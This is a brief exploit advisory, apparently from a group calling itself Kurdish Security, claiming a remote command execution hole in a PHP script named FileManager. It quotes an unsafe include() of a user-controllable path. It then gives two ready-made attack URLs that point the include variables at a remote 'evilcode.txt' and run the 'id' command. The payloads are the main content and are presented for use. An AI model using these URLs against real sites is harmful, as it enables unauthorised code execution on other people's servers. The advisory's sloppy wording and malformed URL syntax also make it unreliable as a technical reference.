FileManager suffers from a remote command execution vulnerability.
4e9aa3eb53cee8bde232cafbd8b510042fdce155a24d16aeb15b5efff1dc1c92
>>> Kurdish Security
>>> FileManager Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : FileManager
>>> Site : http://www.knusperleicht.at
Code :
$dwl_download_path = "downloads";
$dwl_include_path = "dwl/";
include($dwl_include_path."index.php");
?>
http://site.com/[path]/dwl_download_path=evilcode.txt?&cmd=id
http://site.com/[path]/dwl_include_path=evilcode.txt?&cmd=id